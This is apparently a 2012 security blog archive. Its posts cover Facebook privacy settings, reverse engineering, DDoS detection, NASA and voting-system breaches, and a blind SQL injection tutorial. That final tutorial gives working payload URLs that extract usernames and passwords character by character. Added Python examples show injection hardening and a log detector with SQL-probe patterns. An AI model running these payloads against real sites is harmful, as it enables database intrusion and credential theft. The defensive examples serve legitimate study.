Sunday, October 7, 2012



5 ways to secure your Facebook profile in a post-Timeline world



With the ongoing rollout of Facebook's Timeline feature, security and privacy have never been more important to your digital life. The new layout presents all of your current and past activities on Facebook -- posts, photos, comments, likes and so on -- in a handy timeline format to anyone with access to your profile, which may include friends of friends, colleagues, executives at your company, a potential future boss ... well, you get the idea.
If you've made the jump to Timeline -- and if you haven't, you will within the next few weeks, like it or not -- you should know that Facebook has changed a few things, and there are certain settings you need to pay attention to if you're concerned about what parts of your life others can see. Here's how to lock down your profile in the post-Timeline world.

 

1. Limit your connections

Most key privacy settings are accessible by clicking the arrow in the upper right-hand corner of your profile screen (next to your name and the Home button). From here, select Privacy Settings in the drop-down menu.
Click on Edit Settings next to the How You Connect option to begin your profile lockdown. This section contains five privacy settings.
[Image: Limit who can find you, contact you and post to your timeline.]
The first three settings govern who can look up your profile and see your contact information, who can friend you and who can send you messages. For maximum privacy, change the first and third settings to Friends, thereby preventing anyone else from looking up your profile or sending you messages.
The second setting governs who can send you Friend requests. The more secure choice is Friends of Friends, but it limits your connectivity on the world's largest social network. If you're worried about losing out on friendship opportunities, keep it set to Everyone.
The last two settings dictate who can post on your timeline and who sees those posts. Only Me is the safest option, but choosing it severely reduces the number of interactions Facebook offers. If you're seriously considering limiting your timeline posts to you and only you, it might be time to leave Facebook entirely.
Setting both of these options to Friends is relatively safe while still allowing the sharing that makes Facebook fun. And there is a way to review posts from friends before they appear on your timeline, as you'll see in the next section of the story.

2. Tailor your tags

An easily missed entry in the Privacy Settings is one innocuously labeled How Tags Work. However, it is essential to tweak the settings found here if you want to take control of your profile's privacy, as some tagging actions can be pretty invasive.
The first two settings (Timeline Review and Tag Review) are particularly useful. When you enable them, you can review posts and photos that friends tag you in, as well as the tags friends add to your own posts -- all before this information goes public. That's especially valuable if you have well-meaning friends who think tagging you in those Vegas party photos is a good idea.
[Image: Enabling Timeline Review lets you vet posts you're tagged in before they appear on your timeline.]
The third setting, Maximum Timeline Visibility, should be set to Friends or customized for certain friend lists or networks to ensure that these tagged posts, once approved, aren't seen by everyone.
Disable the fourth setting on the list, Tag Suggestions. Disabling it makes it harder for friends to tag large quantities of photos featuring you or people that look like you, but it also takes some of your profile's privacy out of the hands of others.
The last setting on the list is seriously important: It determines whether or not friends can check you in to places. Turn it off. The only thing worse than constantly broadcasting your location is having someone else do it without your express permission.

3. Rein in app permissions

Speaking of permissions, the permission window that used to appear frequently when Facebook apps wanted to access your profile information is pretty much MIA now. Currently, apps need to ask you only once for permission. Once they do, they'll mine your profile information as often as need be, sometimes even when the app isn't being used.
Fortunately, there's a privacy fix. Unfortunately, it's not a quick one, since you'll have to tweak each app's settings individually.
In the main Privacy Settings, click on Edit Settings next to the Apps and Websites entry to bring up the Apps, Games and Websites privacy settings page. Next to "Apps you use," click on Edit Settings again to access a full list of apps running on your profile. Each app is accompanied by an Edit button, which displays the app's permissions when clicked. Each app has different permissions enabled, so you'll have to check each one individually.
[Image: Check each of your Facebook apps to see what permissions it demands.]
Here's the bad news: Some permissions, such as sharing basic profile information with the app, cannot be altered. These are marked by the grayed-out word "Required" next to the particular permission.
Other settings, however, have the word "Remove" next to them -- click on it to remove any permission. These are the only items that can be changed, so you'll have to take a hard look at what permissions an app deems a necessity. If you don't like what you see, click "Remove app" at the top of the same page and learn to live without that app.
For the apps you do keep, it's important to control who sees the information that the apps share -- many of them are designed to broadcast your activities on your timeline and in the "ticker" on the right side of users' home pages. At the bottom of each app's permissions page is another important option entry titled "App activity privacy." Click on the drop-down menu and select Only Me to be sure your app activity isn't seen by anyone else.
Similarly, if you install any new apps, be sure to select Only Me under "Who can see activity from this app on Facebook" on the installation page.

4. Stop others from taking your information with them

The Apps, Games and Websites privacy settings also contain some other features that security hounds would be wise to disable.
Click on Edit Settings next to the entry labeled "How people bring your info to the apps they use." Other users may be able to bring your personal information with them when they use apps and websites. It's all in the interest of making things more social. It can also be invasive. Uncheck the box next to each information category listed (there are 17 of them) to prevent others from using your personal data.
[Image: Prevent others from using your personal information in apps and on other websites.]
Head back to the Apps, Games and Websites privacy settings and click Edit Settings for the "Instant personalization" category. This option should be turned off by default, but check to make sure. You'll first see a pop-up screen explaining the feature; when you close that, you'll be able to see whether it's enabled. If it is, disable it. This will prevent Facebook partner sites from accessing your public information to personalize your experience on their own websites.

5. Reduce your social footprint

Sharing is the whole point of Facebook, but the Timeline layout sometimes takes this to extremes, making it easy for others to see all your activity from years gone by. The good news is that you can disable Recent Activity updates, which broadcast new friendships, groups you've joined and any other changes in your basic information (such as relationship status or political views). Just click on the X next to a Recent Activity update on your timeline and select Hide Similar Activity from Timeline.
This makes the process of hiding certain activities from your past a little easier. But here's the bad news: Individual status updates or posts from, say, your less judicious days need to be removed individually by clicking the pencil icon next to each item and choosing Hide from Timeline -- a process that could take you to the end of 2012 if you've ever been very active on Facebook.
There's a limited solution, though: In the main Privacy Settings window, the second-to-last entry on the list is titled Limit the Audience for Past Posts. Click on the Manage Past Post Visibility link next to it. A window will appear giving you the option to change all past posts so that they're visible only to friends. Click Limit Old Posts to do so.
That will at least prevent anyone other than people you've friended from seeing older items on your timeline. But considering that your boss, colleagues and other acquaintances may be among your Facebook friends, it's still a good idea to review your entire timeline and remove compromising status updates, comments, links and photos. Start with the oldest items first. When you first started using Facebook, you probably had fewer contacts and might have posted and commented with less caution than you've done more recently.
[Image: Limit your posts to friends -- or a select group of friends.]
As a last precaution, make sure that everything you post on Facebook moving forward is shared only with friends, specific networks or friend lists: Click the drop-down box next to your status update, comment, link or other shared content and select Friends or a group. For even more granular control over who can and can't see a post, select the Custom option.
It bears mentioning that the last and best defense against digital privacy invasions is common sense. You may want to be a bit irreverent with your Facebook friends -- and there's nothing wrong with that. But ask yourself if you'd wave that questionable photo or say that pithy comment in front of someone who could affect your future hiring prospects. If not, think twice before you post it on Facebook.

Wednesday, March 14, 2012

Get a PenTest Magazine Issue 2


Separating Fact from Fiction – The realities of Cyber War
By Don Eijndhoven
Cyber War. Two words that you’ll have heard in the news a few times by now. You’ll have heard it more and more over the last year or so. Maybe two or three years if you’ve been halfway interested or happened to be browsing on IT websites that cover cyber warfare. Especially if you’re living in the US, you’ll have heard some pretty fear-inducing stories. And not by just anybody; Richard Clarke himself has said that a Cyber War is the next big threat to national security. He was, of course, referring to the national security of the US, but his critique certainly holds water for other modernized nations. What may be surprising is that he was absolutely right, even though he may be understood poorly.
Multifactor Authentication – A Requirement for the 21st Century
By Robert Keeler
Logon credentials as the only method of granting access to today’s valuable data is far from an acceptable 21st century solution. There is no doubt that the lack of serious authentication for the last decade has created much of the opportunity for the theft of information which has led to identity theft becoming an epidemic. Other than granting initial access, there is no monitoring of a user’s true identity during transaction processing online. There is no forced logout when the user has completed their task. There is no security when Man-in-the-middle attacks can easily penetrate the weaknesses of simple logon credentials being the primary access control to vast amounts of data.
Regulatory Compliance under the Indian Cyber Laws
by Sagar Rahurkar
The Information Technology Act, 2000 (IT Act) is the primary law in India governing “cyberspace”. It has been in force since 17th October, 2000, and the IT (Amended) Act, 2008 has been in force since 27th October, 2009, making significant changes to the original Act. The amendments have for the first time introduced the concept of “Regulatory compliance” under the law for the protection of “Sensitive personal information”.
Ride the Dragon: Testing the Desktop by adopting criminal tools and strategies
by Stefano MacGalia
A usual Pen Testing engagement limits its perimeter of action to exploit specific vulnerabilities identified during phases and, by collecting the results, it ends with a positive or negative occurrence that will be included in the final report by the tester.
This means that, from the Customer's point of view, in case of a positive result (the presence and exploitability of a specific weakness), the corrective action will be suggested and probably enforced later.
Social Engineering
by Falgun Rathod
What if someone asks you for a password? Will you give it? Yes / No. You will say, “Obviously no”, but this is what I call Social Engineering. According to Wiki, “Social Engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.” Social Engineering is not a new thing at all; it’s the art of lying to get confidential information in order to access/hack into a system.
Benefits of Attribution
by Sayngeun Phouamkha
A good friend by the name of “J” once told me in my very early stages of learning IT Security that “The enemy of my enemy is my scapegoat.” Of course, knowing nothing of IT Security or the different arenas/specialties that this field encompasses, I had to have him explain in depth and in very non-IT Security terms exactly what that meant and why it was important to know in this line of work.
Attacking POS: history, technique and a look to the future
When we talk about credit and debit cards, we should remember that this kind of payment was thought up and launched after the Second World War by American Express, and the card as we know it, with a magstripe, was introduced to the market in 1979. Since the beginning of the ’90s we’ve seen an increase in card fraud, first using ATM terminals and subsequently affecting point-of-sale (POS) terminals. Before talking about fraud, we will try to understand how a credit or debit card is composed.


Thursday, March 8, 2012

Reverse Engineering Introduction


What is Reverse Engineering?

Have you ever noticed that Nokia or iPhone releases an application and, a few days later, you find it on Samsung or some other mobile device? There is nothing difficult about it; it is called reverse engineering. They decode the original program to recover its basic structure and then write their own code following that structure. Sometimes they do not even do that, and just make some code changes and use the result.

According to Wikipedia "Reverse engineering is the process of discovering the technological principles of a device, object or system through analysis of its structure, function and operation. It often involves taking something (e.g., a mechanical device, electronic component, biological, chemical or organic matter or software program) apart and analyzing its workings in detail to be used in maintenance, or to try to make a new device or program that does the same thing without using or simply duplicating (without understanding) the original".

Ahh.. more technology related. I will explain it in a better way. As the name suggests, reverse engineering starts from something that is already made; in the computer field, say, an exe installer file. Reverse engineering means decoding the exe in such a fashion that we get the original source code, or something near to it. Consider an example: you have a wall made of bricks, and the bricks are the base material used to build the wall. What we want to do is obtain all the bricks from the wall. Similarly, we have an executable or DLL file, and we know programs are made from code, so source code is the base material for building an executable. We want to obtain the source code from the executable, or something near to it. When you break a wall to get the bricks, some bricks get broken too, and how many depends on the type of material used to bind the bricks into the wall. Similarly, the retrieval of source code from an executable depends on how securely the software is packed and what type of cryptography or packer its designer used.

I hope you have now understood what exactly reverse engineering is.

What is the use or benefit of Reverse Engineering?

I can guarantee that most internet users use cracks, keygens or patches. Have you ever tried to understand how they are made? Ahhh... I know you haven't. So let me give you clear information. All the keygens, cracks and patches for software are made by a technique called reverse engineering. Oops... I was going to tell the benefits.. what am I telling... negative features... But these are features of reverse engineering, my friends, and it is most commonly used by all famous organizations, as it is a part of their program promoting methodology.

Other Beneficial Uses of Reverse Engineering:

  • Product analysis: To examine how a product works
  • Removal of copy protection, circumvention of access restrictions.
  • Security auditing.
  • Extremely useful when you have lost documentation.
  • Academic/learning purposes.
  • Competitive technical intelligence (understand what your competitor is actually doing, versus what they say they are doing).
  • Last but not least, learning: learn from others' mistakes. Do not make the same mistakes that others have already made and subsequently corrected.

Common Terms Used in Reverse Engineering:

1. Debugger
2. Disassembler
3. Decompiler
4. Packers or Unpackers
5. Program Obfuscation
6. Hex Editing
7. Cryptography

I will explain these terms in detail in my next article. Till then you can explore these topics on the internet so that you will have some prior knowledge of reverse engineering terms.

Note: Please use this knowledge for your better understanding of reverse engineering and for study, not to HARM anyone.

Me on Cover Page of International Security Magazine PenTest based in Europe

Falgun Rathod featured on Cover Page of PenTest Magazine


Social Engineering

What if someone asks you for a password? Will you give it? Yes / No. You will say, “Obviously no”, but this is what I call Social Engineering. According to Wiki, “Social Engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.” Social Engineering is not a new thing at all; it’s the art of lying to get confidential information in order to access/hack into a system.
by Falgun Rathod


This is the beginning, lots more to come :)



Sunday, March 4, 2012

NASA Hacked 13 times last Year




'Unencrypted notebook computers that have been lost or stolen include ones containing codes for controlling the International Space Station as well as sensitive data on NASA's Constellation and Orion programs and Social Security numbers'


NASA said hackers broke into its computer systems 13 times last year, stealing employee credentials and gaining access to mission-critical projects in breaches that could compromise U.S. national security.

The National Aeronautics and Space Administration spends only $58 million of its $1.5 billion annual IT budget on cyber security, Paul Martin, the agency's inspector general, told a Congressional panel on NASA security earlier this week.

"Some NASA systems house sensitive information which, if lost or stolen, could result in significant financial loss, adversely affect national security, or significantly impair our nation's competitive technological advantage," Martin said in testimony before the U.S. House Committee on Science, Space and Technology, released on Wednesday. (bit.ly/yQFSB8)

He said the agency discovered in November that hackers working through a Chinese-based IP address broke into the network of NASA's Jet Propulsion Laboratory.

He said they gained full system access, which allowed them to modify, copy, or delete sensitive files, create user accounts for mission-critical JPL systems and upload hacking tools to steal user credentials and compromise other NASA systems. They were also able to modify system logs to conceal their actions, he said.

"Our review disclosed that the intruders had compromised the accounts of the most privileged JPL users, giving the intruders access to most of JPL's networks," he said.

In another attack last year, intruders stole credentials for accessing NASA systems from more than 150 employees.

Martin said the agency has moved too slowly to encrypt or scramble the data on its laptop computers to protect information from falling into the wrong hands.

Unencrypted notebook computers that have been lost or stolen include ones containing codes for controlling the International Space Station as well as sensitive data on NASA's Constellation and Orion programs and Social Security numbers, Martin said.

Source - Reuters

Saturday, February 25, 2012

Understanding DDOS Attack


What is a DDoS Attack?
Compromised PCs, or “bots,” are formed into groups called “botnets” and are used as weapons by cyber-attackers to launch various forms of cyber attacks. These attacks range widely from DDoS to identity theft and clandestine intelligence gathering operations.
During Distributed Denial of Service attempts, attackers launch attacks using different techniques including HTTP, HTTPS, ICMP, SYN Floods, UDP Floods, DNS Request Floods, GET Floods, and others. The attack components are often used in combination, and range in size from a few hundred megabits per second (Mbps) to over 80 gigabits per second (Gbps). Increasingly sophisticated attacks are based around application requests at Layer-7.
Normally, a DDoS attack consists of 3 parts: the master, the slave and, at last, the victim. The master is the attack launcher, i.e. the person/machine behind all this; sounds COOL, right? The slave is the network that has been compromised by the master, and the victim is the target site/server. The master instructs the compromised machines, the so-called slaves, to launch the attack on the victim's site/machine. Hence it is also called a co-ordinated attack.
How do they do it?
A DDoS attack is done in 2 phases. In the first phase they try to compromise weak machines in different networks around the world. This phase is called the Intrusion Phase. It is in the next phase that they install DDoS tools and start attacking the victim's machines/site. This phase is called the Distributed DoS attacks phase.

What allowed them to do it?
  1. Vulnerable software/applications running on a machine or network.
  2. Open network setup.
  3. Network/machine setup without taking security into account.
  4. No monitoring or data analysis being conducted.
  5. No regular audits/software upgrades being conducted.
First, identify whether you are really under attack. If so, follow the steps below:
  • Check whether your machine's load is high and whether a large number of HTTP processes are running.
To find the load, use the command w or uptime.
E.g.:
falgun@localhost> w
 12:00:36 up 1 day, 20:27, 5 users, load average: 0.70, 0.70, 0.57
USER XYZ FROM LOGIN@ IDLE JCPU PCPU WHAT
To find out whether a large number of HTTP processes are running, use the command "ps aux | grep -i '[h]ttp' | wc -l". The -i is needed because the server process is normally listed in lower case (for example httpd), and the [h] keeps grep from counting its own process.
E.g.:
[falgun@localhost]# ps aux | grep -i '[h]ttp' | wc -l
23
On a busy server the number of connections will go above 100. During a DDoS attack the number will go even higher, and that is when we need to find out which networks the attacks are coming from. In a DDoS attack the individual host machine does not have much importance. It is the network that matters, because an attacker will use any machine on the compromised network, or even all the machines in the network. Hence the network address is what matters when fighting the attack.
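One way to find the networks behind the connections, as an added example rather than part of the original post: it groups the peers listed by `ss -tn` into /24 (IPv4) and /64 (IPv6) networks. The prefix lengths, the threshold and the sample output are assumptions constructed for illustration.

```python
import ipaddress
from collections import Counter

# Constructed sample in the column layout printed by `ss -tn`
# (documentation address ranges, not captured from a real host).
SAMPLE_SS_OUTPUT = """\
State    Recv-Q Send-Q Local Address:Port  Peer Address:Port
ESTAB    0      0      192.0.2.10:80       198.51.100.7:51234
ESTAB    0      0      192.0.2.10:80       198.51.100.91:40112
SYN-RECV 0      0      192.0.2.10:80       198.51.100.200:1027
ESTAB    0      0      192.0.2.10:80       203.0.113.5:55001
ESTAB    0      0      192.0.2.10:22       203.0.113.77:60000
ESTAB    0      0      [2001:db8::10]:80   [2001:db8:aa:1::5]:41000
ESTAB    0      0      [2001:db8::10]:80   [2001:db8:aa:1::9]:41001
"""


def split_endpoint(endpoint):
    """Split 'addr:port' or '[v6addr]:port' into (ip_address, port)."""
    host, _, port = endpoint.rpartition(":")
    return ipaddress.ip_address(host.strip("[]")), int(port)


def connections_by_network(ss_output, local_port=80, v4_prefix=24, v6_prefix=64):
    """Count connections to local_port per source network instead of per host."""
    counts = Counter()
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] == "State":
            continue  # header or short line
        try:
            _, port = split_endpoint(fields[3])
            peer, _ = split_endpoint(fields[4])
        except ValueError:
            continue  # wildcard or unparsable endpoint
        if port != local_port:
            continue
        prefix = v4_prefix if peer.version == 4 else v6_prefix
        network = ipaddress.ip_network(f"{peer}/{prefix}", strict=False)
        counts[str(network)] += 1
    return counts


def suspicious_networks(ss_output, threshold, **kwargs):
    """Networks with at least `threshold` connections, busiest first."""
    ranked = connections_by_network(ss_output, **kwargs).most_common()
    return [(net, n) for net, n in ranked if n >= threshold]


if __name__ == "__main__":
    for net, n in suspicious_networks(SAMPLE_SS_OUTPUT, threshold=2):
        print(f"{n:5d}  {net}")
```

On a live server the same functions can be fed the text returned by running `ss -tn`, with the threshold set well above the server's normal per-network count.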
However, there are some actions you can take to protect yourself. Here's some basic advice:
  • Ensure that you have adequate bandwidth on your Internet connection. You'll be able to foil many low-scale DDoS attacks by simply having enough bandwidth (and processing power) to service the requests.
  • Deploy an intrusion prevention system on your network. Some (but definitely not all) DDoS attacks have recognizable signatures that an IPS can detect and use to prevent the requests from reaching the Web server.
  • Use a DDoS prevention appliance, including any of the Cisco Systems Inc. Cisco Guard products, that is specifically designed to identify and thwart distributed denial-of-service attacks.
  • Maintain a backup Internet connection with a separate pool of IP addresses for critical users. While you won't be able to switch all access to your website over to a backup connection (the attacks will switch at the same time!), you can provide critical users with an alternate path to your site if the primary circuit is swamped with bogus requests.
These tips should get you started on the road toward building a hardy Web infrastructure with the highest probability of surviving a DDoS attack. Good luck!




Friday, February 24, 2012

Small Coding Mistake Led to an Internet Voting System Failure


The main security weakness that let University of Michigan researchers take control over a planned city of Washington, D.C. Internet voting system pilot for overseas voters in 2010 was "a tiny oversight in a single line of code," the researchers say in a new paper (.pdf) detailing their exploits. City officials canceled the pilot shortly before the November election after the hack was revealed.
It's evidence, say the researchers--led by Assistant Professor J. Alex Halderman--that Internet voting should be postponed until major new breakthroughs in cybersecurity occur, if they ever do. Mistakes like the one they exploited are all too common, hard to eradicate, and indicative of a brittleness in web applications, they say. Seemingly trivial errors can result in attackers gaining system dominance--and in the case of an internet voting system, controlling the outcome of an election.
Responding to a call by Washington, D.C., election officials for outsiders with no previous access to test system security, Halderman and his students penetrated the pilot system within 48 hours of it going online. Their successful attack went undetected for another 36 hours, they say, despite the fact that they left a calling card in the form of having the vote confirmation screen play the University of Michigan fight song after 15 seconds. Even then, the detection didn't occur because D.C. officials spotted anomalies in intrusion detection system logs, or even stumbled on the fight song itself, but because someone on a mailing list monitored by the city asked, "does anyone know what tune they play for successful voters?"
The main exploit researchers used was a shell-injection vulnerability done by uploading a fake ballot with a command function as the file extension. The file uploader plugin D.C. election officials used preserved the file extension and the command line interpreter executed the command, the paper says.
Attackers also found that a system firewall filtered outbound network traffic, but that they could steal data by sending files to the images directory on the compromised server and retrieving it with any HTTP client.
Once inside the application server, they retrieved the public key for encrypting ballots, proceeding to replace all encrypted stored ballot files with forged votes. They also modified the system so that new ballots were sent to a subfolder in the images directory and the new originals replaced with more forgeries.
They also managed to violate the secrecy of balloting, the paper says, since before ballots were encrypted, the file uploader placed them in a temporary directory. But, the web application didn't delete the unencrypted ballots. The files did not contain a voter's identification, but did display the precinct and time of voting, letting researchers compare them to server application logs and associate them with people's identities.
In maybe the greatest oversight of city officials, researchers also found in the temporary directory a 937 page .pdf document containing real voters' credentials for using the system, meaning that attackers could have cast votes as those citizens in the real election.
"One small mistake in the configuration or implementation of the central voting servers or their surrounding network infrastructure can easily undermine the legitimacy of the entire election" they conclude.
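The shell-injection flaw described above, reduced to a harmless added example (not code from the paper or from the D.C. system): `echo` stands in for whatever command the server ran on the uploaded file, and the function names, the `.pdf` allow-list and the constructed file name are assumptions.

```python
import os
import secrets
import subprocess

ALLOWED_EXTENSIONS = {".pdf"}  # assumption: ballots are expected as PDF files

# Constructed file name whose "extension" is a harmless command substitution.
CONSTRUCTED_FILENAME = "ballot.$(echo INJECTED)"


def process_upload_vulnerable(upload_dir, client_filename):
    """Keeps the client-supplied extension and builds a shell command line from it."""
    ext = os.path.splitext(client_filename)[1]
    path = os.path.join(upload_dir, "ballot" + ext)
    # shell=True hands the whole string to /bin/sh, which evaluates $(...) in it.
    result = subprocess.run("echo processing " + path, shell=True,
                            capture_output=True, text=True)
    return result.stdout.strip()


def run_without_shell(path):
    """Passes the path as one argv element, so no shell ever parses it."""
    result = subprocess.run(["echo", "processing", path],
                            capture_output=True, text=True, check=True)
    return result.stdout.strip()


def process_upload_hardened(upload_dir, client_filename):
    """Allow-lists the extension, discards the client's name, avoids the shell."""
    ext = os.path.splitext(client_filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("rejected upload: extension not allowed")
    # The stored name is generated server-side; nothing typed by the client survives.
    path = os.path.join(upload_dir, secrets.token_hex(16) + ext)
    return run_without_shell(path)


if __name__ == "__main__":
    # The shell ran the substitution: the output ends in "ballot.INJECTED".
    print(process_upload_vulnerable("/srv/uploads", CONSTRUCTED_FILENAME))
    # Same bytes without a shell stay literal text.
    print(run_without_shell("/srv/uploads/" + CONSTRUCTED_FILENAME))
    try:
        process_upload_hardened("/srv/uploads", CONSTRUCTED_FILENAME)
    except ValueError as err:
        print(err)
```

Either control alone (argument vector instead of a shell string, or a server-generated file name) removes this path; the example applies both.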

For more:
download the paper from J. Alex Halderman's website (.pdf)
Source - http://www.fiercegovernmentit.com/story/small-coding-mistake-led-big-internet-voting-system-failure/2012-02-22 - 

Thursday, February 23, 2012

Blind SQL Injection Tutorial Illustrated


Blind injection is a little more complicated than classic injection, but it can be done :D

It's somewhat hard, but good to learn.

1) http://www.site.com/news.php?id=5

When we execute this, we see a page with articles, pictures etc. on it. Then, when we want to test it for a blind SQL injection attack:

2) http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok. Now the real test:

3) http://www.site.com/news.php?id=5 and 1=2 <--- this is false

So if some text, picture or other content is missing on the returned page, then that site is vulnerable to blind SQL injection. Hacker's work started :)
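Why the page differs between the two tests, and how that true/false signal disappears once the parameter is validated and bound, shown as an added example that is not from the original post. SQLite stands in for MySQL, and the table contents and function names are assumptions.

```python
import re
import sqlite3


def make_db():
    """In-memory stand-in for the site's database with one constructed article."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES (5, 'Constructed sample article')")
    return db


def get_article_vulnerable(db, raw_id):
    """Pastes the id parameter into the SQL text, as a page like news.php?id=... would."""
    query = "SELECT title FROM news WHERE id = " + raw_id
    return db.execute(query).fetchall()


def get_article_hardened(db, raw_id):
    """Accepts only a short run of digits and binds it as an integer parameter."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return None  # same "not found" answer for every malformed id
    row = db.execute("SELECT title FROM news WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for value in ("5", "5 and 1=1", "5 and 1=2"):
        # Vulnerable: the appended condition becomes part of the WHERE clause,
        # so the article appears for 1=1 and vanishes for 1=2.
        # Hardened: both appended conditions get the identical "not found" result,
        # so the response no longer answers true/false questions.
        print(repr(value), get_article_vulnerable(db, value), get_article_hardened(db, value))
```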

1) Get the MySQL version

To get the version in a blind attack we use substring,
i.e.
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

This should return TRUE if the version of MySQL is 4. Replace 4 with 5, and if the query returns TRUE then the version is 5.
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works
When select doesn't work, we use subselect,
i.e.
http://www.site.com/news.php?id=5 and (select 1)=1

If the page loads normally then subselects work. Then we are going to see if we have access to mysql.user,
i.e.
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

If the page loads normally we have access to mysql.user, and then later we can pull some passwords using the load_file() function and OUTFILE.

3) Check table and column names. This is the part where guessing is the hacker's best friend ...
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, because the subselect returns only 1 row; this is very important.)

Then if the page loads normally without content missing, the table users exists.
If you get FALSE (some article missing), just change the table name until you guess the right one :)

Let's say that we have found that the table name is users; now what we need is the column name.
The same as with the table name, we start guessing. Like I said before, try the common names for columns.
i.e.
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

If the page loads normally we know that the column name is password (if we get false then try common names or just guess).
Here we merge 1 with the column password, then substring returns the first character (,1,1).


4) Pull data from database
We found the table users and the columns username and password, so we are going to pull characters from them.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

OK, this here pulls the first character from the first user in the table users.
substring here returns the first character, 1 character in length. ascii() converts that 1 character into its ASCII value, which is then compared using the greater-than symbol >.
So if the ASCII value is greater than 80, the page loads normally (TRUE).
We keep trying until we get false.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

So the first character in username is char(99). Using the ASCII converter we know that char(99) is the letter 'c'.

Then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that I've changed ,1,1 to ,2,1 to get the second character (now it returns the second character, 1 character in length).

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105

FALSE!!!

We know that the second character is char(105) and that is 'i'. We have 'ci' so far,
so keep incrementing until you get to the end (when >0 returns false we know that we have reached the end).
There are some tools for blind SQL injection; I think sqlmap is the best, but I'm doing everything manually,
because that makes you a better SQL INJECTOR :D

Hope you learned a lot from this. This is just for educational purposes.
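From the defender's side, the requests in this walkthrough leave a distinctive trail in the web server's access log: one client, one parameter, many near-identical values carrying SQL fragments. The following added example (not part of the original post) counts such probes per client; the log lines are constructed, and the patterns and threshold are assumptions to tune.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines in common log format (documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.23 - - [23/Feb/2012:10:00:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5120
198.51.100.23 - - [23/Feb/2012:10:00:02 +0000] "GET /news.php?id=5%20and%201=1 HTTP/1.1" 200 5120
198.51.100.23 - - [23/Feb/2012:10:00:03 +0000] "GET /news.php?id=5%20and%201=2 HTTP/1.1" 200 2048
198.51.100.23 - - [23/Feb/2012:10:00:04 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E80 HTTP/1.1" 200 5120
198.51.100.23 - - [23/Feb/2012:10:00:05 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E95 HTTP/1.1" 200 5120
203.0.113.9 - - [23/Feb/2012:10:00:06 +0000] "GET /news.php?id=7 HTTP/1.1" 200 4096
203.0.113.9 - - [23/Feb/2012:10:00:07 +0000] "GET /search.php?q=select+committee+report HTTP/1.1" 200 3000
""".splitlines()

LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" \d{3} '
)

# SQL fragments that have no business inside a numeric id or a search term.
SQL_PROBE_PATTERNS = [
    re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),          # and 1=1 / and 1=2
    re.compile(r"\b(?:ascii|substring|substr|mid|concat|load_file)\s*\(", re.I),
    re.compile(r"@@version", re.I),
    re.compile(r"\(\s*select\b", re.I),                          # subselect
]


def probe_hits(log_lines):
    """Count requests whose decoded parameter values contain SQL fragments."""
    hits = Counter()
    for line in log_lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes each value before the patterns see it.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if any(p.search(value) for p in SQL_PROBE_PATTERNS):
                hits[(client, parts.path, name)] += 1
    return hits


def blind_sqli_suspects(log_lines, min_hits=3):
    """(client, path, parameter, hits) for clients probing one parameter repeatedly."""
    return sorted(
        (client, path, name, n)
        for (client, path, name), n in probe_hits(log_lines).items()
        if n >= min_hits
    )


if __name__ == "__main__":
    for suspect in blind_sqli_suspects(SAMPLE_LOG):
        print(suspect)
```

The benign search for "select committee report" is not counted, because the patterns look for SQL structure rather than single keywords.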